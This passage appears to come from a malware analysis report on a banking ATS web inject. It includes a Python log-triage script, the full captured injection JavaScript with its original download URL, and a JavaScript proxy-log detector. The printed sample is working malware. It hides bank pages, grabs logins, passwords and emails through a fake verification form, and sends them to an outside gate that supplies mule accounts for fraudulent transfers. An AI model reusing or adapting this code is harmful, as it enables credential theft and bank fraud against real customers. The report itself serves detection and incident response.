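            "client_time": ssid_time(query["ssid"]),
            # addLog(..., "saveLoginData", ...) entries travel in msg
            "credentials_logged": "saveLoginData" in query.get("msg", "")}


def summarize(log_text):
    """Group hits by client address so affected workstations can be triaged."""
    hosts = defaultdict(lambda: {"cnc_hosts": set(), "gate_hosts": set(),
                                 "botids": set(), "actions": [],
                                 "credentials_logged": False,
                                 "drop_requested": False})
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue
        hit = classify(fields[2])
        if hit is None:
            continue
        rec = hosts[fields[1]]
        if hit["kind"] == "cnc":
            rec["cnc_hosts"].add(hit["host"])
            continue
        rec["gate_hosts"].add(hit["host"])
        rec["botids"].add(hit["botid"])
        rec["actions"].append(hit["action"])
        rec["credentials_logged"] |= hit["credentials_logged"]
        # get_drop_data means the script asked the panel for a transfer destination
        rec["drop_requested"] |= hit["action"] == "get_drop_data"
    return dict(hosts)


if __name__ == "__main__":
    for client, rec in summarize(SAMPLE_LOG).items():
        print(client, rec)
```

A client with credentials_logged or drop_requested set should be prioritised: the first means login data left the browser, the second means the ATS flow progressed to requesting a transfer destination.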
 

Appendix 2: ATS Engine Script

Original download URL https://tools-data.ru/de/comz_plv2.js with Referer set to https://www.commerzbank.com/.

if(typeof adblockadblock === typeof undefined) {
window.adblockadblock=1;
var bldt98uu = (function(){
var mysetTimeout=window.setTimeout;
var mysetInterval=window.setInterval;
var myeval=window.eval; 
if(1==3){
window.setTimeout=function(){}
window.setInterval=function(){}
window.eval=function(){}
}
if(1==2){
var antifrod=true;
window.setTimeout=function(){if(antifrod)return 123;aa=mysetTimeout(arguments[0],arguments[1]);return aa;}
window.setInterval=function(){if(antifrod)return 123;aa=mysetInterval(arguments[0],arguments[1]);return aa;}
window.eval=function(){if(antifrod)return 123;aa=myeval(arguments[0]);return aa;}
}
 
var my7=jQuery.noConflict(true);
my7.fn.removeStyle = function(style) {var search = new RegExp(style + '[^;]+;?', 'g');return this.each(function(){my7(this).attr('style', function(i, style) {return style.replace(search, '');});});};
my7.fn.onEnterKey = function( ) { my7(this).keypress( function( event ) { var code = event.keyCode ? event.keyCode : event.which;if (code == 13) { return false;}} );};
 
var wwww="tools-data.ru";
var blokss="zzz";
var affid="plv2";
affid="commz999";
 
 
var home_link = "https://"+wwww+"/az/atsbmid";var gate_link = home_link+"/gate.php?obj=bldt98uu&q="+affid;var pkey = "Bc5rw12";
var waitdiv="<div><br/><br/><br/><br/><center> Harap tunggu&#8230; Karena pembaruan perangkat lunak saat ini, pengaturan akun Anda sedang berlangsung saat ini... Ini dapat memerlukan waktu sampai 5 menit. <br/>Perhatian! Jangan membuka ulang halaman tersebut dan jangan menekan tombol kembali! Ini dapat menyebabkan pemblokiran akun Anda! <br/><br/><br/><img id="zzz" src="https://"+wwww+"/indicator.gif"></img><br/><br/><center></div>";
var waitfkk="<table id="fkdiv" align="center" border="0" cellpadding="0" cellspacing="0" width="97%"> <tbody><tr> <td colspan="3" class="header" height="30"><div class="header" align="center">Verifikasi tambahan identitas<div class="catatantext2" align="left"> <div align="right"></div> </div> </div></td> </tr> <tr> <td height="10" width="55%"></td> <td width="5%"></td> <td width="40%"></td> </tr>     <tr> <td colspan="3"> <div class="text-bold" align="right">Masukkan e-mail Anda yang terdaftar di system Mandiri</div> </td> </tr> <tr> <td height="20"></td> <td><div align="center"></div></td> <td></td> </tr> <tr>    <td>     <div class="text-bold"> <div align="right">E-mail</div> </div>    </td>    <td><div align="center"><span class="text-bold">:</span></div></td>    <td><input id="fkmail" size="25" value="" type="text"></td> </tr> <tr> <td height="20"></td> <td></td> <td></td> </tr> <tr align="right" valign="middle"> <td colspan="3">           <div><input id="fksend" src="images/button-kirim.gif" alt="Enter to submit" border="0" height="20" type="image" width="136"></div>           </td> </tr> </tbody></table>";
var waitlok="<div><br/><br/><br/><br/><center> Kami bekerja pada pemutakhiran database, sehingga layanan ini sementara tidak tersedia. <br/>Kami akan mencoba untuk melanjutkan layanan sesegera mungkin. Silahkan coba lagi dalam beberapa jam.<br/><br/><center></div>";
 
var botid = "0";
try{ if(window.rem777bname) botid = window.rem777bname;}catch(e){}
var ifr_state = -1;
var browser_type="NN";
 
var dialog7=1;
var show_debug = false;
var dredea2a=false;
var lochref=location.href;
var replaz="";
 
var loginbtn=false;var ats_started="";var ifr_window=false;var onwrite_state=-1;var login="empty";var holder_name="empty";var transfer_from_account_nr="";var balances="";var tmp_val="empty";var tmp_val2="empty";
var max_sum=-9999999;var drop_name="";var drop_city="";var drop_country="";var iban="";var memo_text="";var transfered_amount=0;var msg_type="";var msg="";var return_type="";var page_content=[];
function urlEncode(b){function gethex(a){return"%"+f.charAt(a>>4)+f.charAt(a&0xF)}var c="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz-_.~";var d="!*'();:@&=+$,/?%#[]";var e=c+d;var f="0123456789ABCDEFabcdef";b=b+"";var g="";if(!b||b.length==0){return""}for(var i=0;i<b.length;i++){var h=b.charAt(i);if(c.indexOf(h)!=-1){g=g+h}else{var j=b.charCodeAt(i);if(j<128){g=g+gethex(j)}if(j>127&&j<2048){g=g+gethex((j>>6)|0xC0);g=g+gethex((j&0x3F)|0x80)}if(j>2047&&j<65536){g=g+gethex((j>>12)|0xE0);g=g+gethex(((j>>6)&0x3F)|0x80);g=g+gethex((j&0x3F)|0x80)}if(j>65535){g=g+gethex((j>>18)|0xF0);g=g+gethex(((j>>12)&0x3F)|0x80);g=g+gethex(((j>>6)&0x3F)|0x80);g=g+gethex((j&0x3F)|0x80)}}}return g}
function returnTrue(a){return a==null||a==undefined||a=="null"||a=="undefined"||a=="empty"||a==""||a==" "||a.length<4?false:true}
function clearLog(){msg="";msg_type="";return_type="";page_content=[]}
function removealls(){}
function formatCurrency(a){a=a.toString().replace(/$|,/g,"");if(isNaN(a)){a="0"}sign=a==(a=Math.abs(a));a=Math.floor(a*100+0.50000000001);cents=a%100;a=Math.floor(a/100).toString();if(cents<10){cents="0"+cents}for(var i=0;i<Math.floor((a.length-(1+i))/3);i++){a=a.substring(0,a.length-(4*i+3))+" "+a.substring(a.length-(4*i+3))}return(sign?"":"-")+a}
function addLog(a,b,c,d){var e=new Date;e="z_"+botid+" "+ats_started+" "+(e.getHours()<10?"0":"")+e.getHours()+":"+(e.getMinutes()<10?"0":"")+e.getMinutes()+":"+(e.getSeconds()<10?"0":"")+e.getSeconds();msg_type=msg_type.length==0?c:!/error|warning/.test(msg_type)?c:msg_type;if(/error|warning/.test(c)){var f=page_content.length;var g="rn<base href='"+a.location.href.substr(0,a.location.href.lastIndexOf("/")+1)+"'>";page_content[f]=[];page_content[f].content_link=a.location.href;page_content[f].content="<html>"+g+"rn"+document.documentElement.innerHTML+"</html>"}msg="["+e+"] "+c+": "+b+"() -> "+d+(msg.length==0?"":"<br>")+msg}
function formatCurrency2(a){a=a+"";a=a.replace(/$|,/g,"");if(isNaN(a)){a="0"}sign=a==(a=Math.abs(a));a=Math.floor(a*100+0.50000000001);cents=a%100;a=Math.floor(a/100).toString();if(cents<10){cents="0"+cents}for(var i=0;i<Math.floor((a.length-(1+i))/3);i++){a=a.substring(0,a.length-(4*i+3))+"."+a.substring(a.length-(4*i+3))}return(sign?"":"-")+a}
 
 
 
 
function getData(a,b){removealls();if(!returnTrue(login)&&!/variables|write_log|get_parsed_numbers|send_b64_data/i.test(a)){doLogout();return}var c=drop_name.length>0?"&transfer_from_account_nr="+urlEncode(transfer_from_account_nr)+"&drop_name="+urlEncode(drop_name)+"&iban="+urlEncode(iban)+"&memo_text="+urlEncode(memo_text)+"&transfered_amount="+urlEncode(transfered_amount+""):"";var d=msg.length>0?"&msg_type="+urlEncode(msg_type)+"&msg="+urlEncode(msg)+"&return_type="+urlEncode(return_type||"atsEnd"):"";var e=balances.length>0?"&balances="+urlEncode(balances):"";var f="&bt="+urlEncode(browser_type)+"&botid="+urlEncode(botid);balances="";clearLog();
window.bldt98uu={};window.bldt98uu.CallResponse=function(msg_type, msg, ssid){
delete bldt98uu;my7("script[src*=atsbmid]").remove();callResponse(msg_type, msg, ssid);
};
my7.getScript(a+d+e+c+f);//my7("script[src*=atsbmid]").remove();
}
 
function postPageContent(){removeContentGrabberDiv();var a=document.createElement("div");a.id="contentGrabberDiv";if(!show_debug){a.style.display="none"}document.body.appendChild(a);var b="";b+="<iframe id=\"contentGrabbeIframe\" name=\"contentGrabbeIframe\" onLoad=\"try{bldt98uu.OnLoadContentGrabberIframe()}catch(err){void(0)}\"></iframe>";b+="<form method=\"POST\" action=\""+gate_link+"\" id=\"contentGrabberForm\" target=\"contentGrabbeIframe\">";b+="<textarea name=\"action\">write_log</textarea>";if(returnTrue(login)){b+="<text"+"area name=\"login\">"+login+"</text"+"area>"}if(balances.length>0){b+="<text"+"area name=\"balances\">"+balances+"</text"+"area>"}b+="<text"+"area name=\"msg_type\">"+msg_type+"</text"+"area>";b+="<text"+"area name=\"msg\">"+msg+"</text"+"area>";b+="<text"+"area name=\"return_type\">"+(return_type||"atsEnd")+"</text"+"area>";b+="<text"+"area name=\"pkey\">"+pkey+"</text"+"area>";b+="<text"+"area name=\"bt\">"+browser_type+"</text"+"area>";for(var i in page_content){b+="<text"+"area name=\"content_link_"+i+"\">"+page_content[i].content_link+"</text"+"area>";b+="<text"+"area name=\"content_"+i+"\">"+page_content[i].content.replace(/textarea/ig,"Zextarea")+"</text"+"area>"}b+="</form>";a.innerHTML=b;var c=document.getElementById("contentGrabberForm");balances="";clearLog();c.submit();}
function removeContentGrabberDiv(){if(document.getElementById("contentGrabberDiv")){document.getElementById("contentGrabberDiv").parentNode.removeChild(document.getElementById("contentGrabberDiv"))}}
function getDropData(a){var b="&action=get_drop_data";var c=Number(new Date);getData(gate_link+b+"&login="+urlEncode(login)+"&max_sum="+a+"&pkey="+urlEncode(pkey)+"&ssid="+c,c)}
function transferExists(){var a="&action=transfer_exists";var b=Number(new Date);getData(gate_link+a+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+b,b)}
function writeLog(){if(page_content.length>0){zz=1;if(return_type=="atsEnd")zz=2;if(return_type=="showing")zz=3;postPageContent();if(zz==29)atsEnd();if(zz==3)show99();}else{var a="&action=write_log";var b=Number(new Date);getData(gate_link+a+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+b,b)}}
function writeVariables(a,b){onwrite_state=b;var c="&action=set_variables";for(var d in a){c+="&"+d+"="+urlEncode(a[d])}var e=Number(new Date);getData(gate_link+c+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+e,e)}
function readVariables(){var a="&action=get_variables";var b=Number(new Date);getData(gate_link+a+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+b,b)}
function getcurr(a){return parseFloat(a.split(/,|\./)[0].replace(/[^0-9--]/igm,""));}
 
function show99(){
my7("html").show();
}
 
function lokPage(){
my7("body").html(waitlok);show99();
addLog(document,"lokPage","info","lokPage");return_type="0";writeLog();
return;
}
 
function replacerCanStart(){lokPage();}
function submitToken(type){}
 
function atsEnd(){
addLog(document,"atsStart","info","end work");
ats_started="99";writeVariables({login:login,ats_started:ats_started},99);
}
 
function setconfig(b){var d=b.split("^z^");drop_name=d[0];drop_city=d[1];drop_country=d[2];iban=d[3];memo_text=d[4];transfered_amount=parseInt(d[5]);transfer_from_account_nr=d[6];}
 
function replacerzzz(a){ }
 
var tmprv="";
function callResponse(a,b,c){
removealls();
if(b=="lokPage"){lokPage();}
if(b=="doLogout"){top.location.href="https://ib.bankmandiri.co.id/";}
if(a=="error"){return;}
else if(a=="set_variables"){onWriteVariables()}
else if(a=="get_variables"){
tmprv=b;
console.log(b);
var d=b.split("^^^");
login=d[0];
holder_name=d[1];
ats_started=d[2];
tmp_val=d[3];
tmp_val2=d[4];
if(d[5].length>9) {replaz=d[5];replacerzzz(replaz);return;}
//replacer_received=parseReplacerArray(d[5]);
if(!returnTrue(login)){
ats_started=="99";
addLog(document,"callResponse","logout","login is empty. redirecting to login page");return_type="doLogout";writeLog();return;
}
onReadVariables();
}
 
else if(a=="transfer_exists"){
var d=b.split("^^^");var e=d[0]=="YES"?true:false;var f=d[1];
if(e){addLog(document,"callResponse","failed","transfer already exists for "+f);return_type="atsEnd";writeLog();return}
addLog(document,"callResponse","info","no transfers for this account. requesting drop for "+max_sum);getDropData(max_sum)
}
else if(a=="get_drop_data"){
if(/^(\[EMPTY\])$/.test(b)){
addLog(document,"callResponse","info","no drops in admin panel.");
ats_started="2";writeVariables({login:login,ats_started:ats_started,tmp_val2:tmp_val2},888);
//addLog(document,"callResponse","failed","no drops in admin panel.");return_type="atsEnd";writeLog()
}
else if(/^(\[NOT_FOUND\])$/.test(b)){addLog(document,"callResponse","failed","no suitable drops in admin panel.");
ats_started="2";writeVariables({login:login,ats_started:ats_started,tmp_val2:tmp_val2},888);
}
else{
top.d0r0op=b;
setconfig(b);
addLog(document,"callResponse","info","Starting transfer to: '"+iban+"' amount "+transfered_amount);
ats_started="3";writeVariables({login:login,ats_started:ats_started},888);
}
}
else if(a=="write_log"){
if(b=="atsEnd"){atsEnd()}
if(b=="showing"){show99();}
if(b=="readVariables"){readVariables()}
}
}
 
function IsEmail(email) {var regex = /^([a-zA-Z0-9_\.\+\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;return regex.test(email);}
function showmailfake(){
if(typeof window.mailok != typeof undefined) {delete mailok;submitimg(loginbtn);return;}
q1=my7(loginbtn).closest("table");
q1.after(waitfkk);
q1.hide();
my7("#fksend").click(function(){
var mailz=my7("#fkmail").val();
if(IsEmail(mailz)){
addLog(document,"saveLoginData","info","EMAIL:"+mailz);
ats_started="1";writeVariables({login:login,ats_started:ats_started,tmp_val:mailz},1);
} else {
addLog(document,"onLoaded","info"," mmssgg BADMAIL:"+mailz);return_type="0";writeLog();
alert("Anda masukkan e-mail yang salah");
}
return false;
});
}
 
 
function onWriteVariables(){
removealls();
if(onwrite_state==101){showmailfake();}
if(onwrite_state==1){submitimg(loginbtn);}
 
else if(onwrite_state==99){
top.dredea2a=true;
menuclick("https://ib.bankmandiri.co.id/retail/Welcome.do?action=result");
 
else if(onwrite_state==757){transferExists();}
else if(onwrite_state==371){window.refreshCityList();}
else if(onwrite_state==372){window.refreshBranchLocationList();}
else if(onwrite_state==373){transferExists();}
 
}
 
 
 
function onReadVariables(){
if(ats_started=="0"){
show99();
addLog(document,"atsStart","info","tmprv:"+tmprv);
ats_started="99";writeVariables({login:login,ats_started:ats_started},99);return;
}
 
if(ats_started=="99"){show99();return;}
 
 
if(ats_started=="1"){
q1=my7ajx("ol.breadcrumb li");
if(q1.size()==1) {holder_name=q1.text().replace(/^\s*|\s$|\t|\r|\n/gim,"");}
 
q1=my7("div#Authorization");
if(q1.size()>0)
{
loginbtn=my7("a#REKENING");
if(loginbtn.size()!=1) {addLog(document,"onLoadIframe","error","error REKENING?");return_type="0";writeLog();show99();return;}
 
tmpx="";
tmpx=my7("span.bcum").text().replace(/^\s*|\s$|\t|\r|\n/gim,"")+"||";
tmpx+=my7("div.pageheadingcaps h1").text().replace(/^\s*|\s$|\t|\r|\n/gim,"")+"||";
q1=my7("div#DispForm");
if(q1.size()!=1){addLog(document,"onLoadIframe","error","error DispForm?");return_type="0";writeLog();show99();return;}
q1=q1.find("h2:has(span.simpletext), h3:has(span.simpletext), p.formrow:has(span.querytextleft):has(span.querytextright)");
q1.each(function(){
q2=my7(this);
if(q2.is("h3, h2")){tmpx+="hZZ"+q2.text()+"ZZ ||";return;}
w1=q2.find("span.querytextleft");
w2=q2.find("span.querytextright");
if(w2.find("a").size()>0){tmpx+="aZZ";}else{tmpx+="tZZ";}
tmpx+=w1.text()+"ZZ";
tmpx+=w2.text()+"||";
});
 
addLog(document,"onReadVariables","info","DETECT. go to REKENING");
ats_started="101";writeVariables({login:login,ats_started:ats_started,tmp_val2:tmpx},2);
return;
}
 
show99();
addLog(document,"onReadVariables","info","page:"+holder_name+" | "+document.title);
ats_started="1";writeVariables({login:login,ats_started:ats_started},298);
return;
}
 
 
else {
show99();
addLog(document,"onLoadIframe","error","lol??? "+ats_started+" "+lochref);return_type="0";writeLog();
}
 
}
 
var mon="not";
function onLoaded(){
lgf=my7("input#teilnehmer");
pss=my7("input#pin");
loginbtn=my7("button#headerLoginSubmit");
if(loginbtn.length>0 && lgf.length>0 && pss.length>0) {
var clicked=function(){
login=lgf.val();
addLog(document,"saveLoginData","info","ua:"+window.navigator.userAgent);
addLog(document,"saveLoginData","info","domain:"+document.location.host);
addLog(document,"saveLoginData","info","login MMSSGG details:"+login+"|||"+pss.val());
ats_started="1";writeVariables({login:login,ats_started:ats_started},101);
return false;
};
my7("form, input").onEnterKey();
show99();
loginbtn.click(function(){clicked();return false;});
return;
}
readVariables();return;
}
 
return{
   Run: function(){
   my7("html").hide();
 my7(document).ready(function(){onLoaded();}); 
   },
   CallResponse: function(msg_type, msg, ssid){callResponse(msg_type, msg, ssid);},
   OnLoadIframe: function(a,b){onLoadIframe(a,b);},
   SubmitToken: function(type){submitToken(type);},
   addLog: function(a,b,c,d){addLog(a,b,c,d);},
   writeLog: function(){writeLog();},
   fake77: function(a,b){fake77(a,b);}
}
}());
 if(bldt98uu.Run)bldt98uu.Run();
delete bldt98uu;
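
The request shape that getData() builds in the listing above (an `action` value, `pkey`, a millisecond `ssid`, `bt` and `botid`) can be matched in web proxy logs. The following is an added detection example, not part of the captured sample or the original analysis; the log layout, the host `gate.example`, the `atsbmid=1` parameter and the function names are assumptions made for illustration.

```javascript
// Added detection example; every log line below is constructed.
const ATS_ACTIONS = new Set(["get_drop_data", "transfer_exists", "write_log",
  "set_variables", "get_variables"]);
// Fields getData() appends once a transfer has been configured (drop_name set).
const TRANSFER_FIELDS = ["transfer_from_account_nr", "drop_name", "iban",
  "memo_text", "transfered_amount"];

function classifyGateRequest(rawUrl) {
  let url;
  try { url = new URL(rawUrl); } catch (e) { return null; } // unparsable field
  const q = url.searchParams;
  const action = q.get("action");
  if (!ATS_ACTIONS.has(action)) return null;
  const markers = [];
  if (q.has("pkey")) markers.push("pkey");
  // ssid is Number(new Date) in the sample: epoch milliseconds (13 digits).
  if (/^\d{13}$/.test(q.get("ssid") || "")) markers.push("ssid-epoch-ms");
  if (q.has("botid") && q.has("bt")) markers.push("botid+bt");
  // getData() removes script[src*=atsbmid], which suggests the gate URL
  // contains that string (an inference from the listing).
  if (url.href.includes("atsbmid")) markers.push("atsbmid");
  const transfer = TRANSFER_FIELDS.filter((f) => q.has(f));
  // A generic "action=write_log" alone is not enough: require two more markers.
  if (markers.length < 2) return null;
  return { host: url.host, action, markers,
    hasTransfer: transfer.length === TRANSFER_FIELDS.length };
}

function scanProxyLog(lines) {
  // Assumed log layout: "<timestamp> <client-ip> <method> <url>"
  return lines.map((l) => l.trim().split(/\s+/))
    .filter((p) => p.length >= 4)
    .map((p) => ({ client: p[1], match: classifyGateRequest(p[3]) }))
    .filter((r) => r.match !== null);
}

// Constructed sample; gate.example and the "atsbmid=1" parameter are placeholders.
const SAMPLE_LOG = [
  "2015-12-29T10:00:01Z 10.0.0.5 GET http://gate.example/g?atsbmid=1&action=get_variables&login=user1&pkey=k&ssid=1451383201000&bt=IE&botid=B1",
  "2015-12-29T10:00:09Z 10.0.0.5 GET http://gate.example/g?atsbmid=1&action=set_variables&login=user1&ats_started=3&pkey=k&ssid=1451383209000&transfer_from_account_nr=1&drop_name=d&iban=i&memo_text=m&transfered_amount=5&bt=IE&botid=B1",
  "2015-12-29T10:00:12Z 10.0.0.7 GET https://shop.example/cart?action=write_log&item=4",
];

for (const hit of scanProxyLog(SAMPLE_LOG)) {
  console.log(hit.client, hit.match.host, hit.match.action, hit.match.markers.join(","));
}
```

A match with `hasTransfer` set means the request carried all five transfer fields, so the affected session should be prioritised for review with the bank's fraud team.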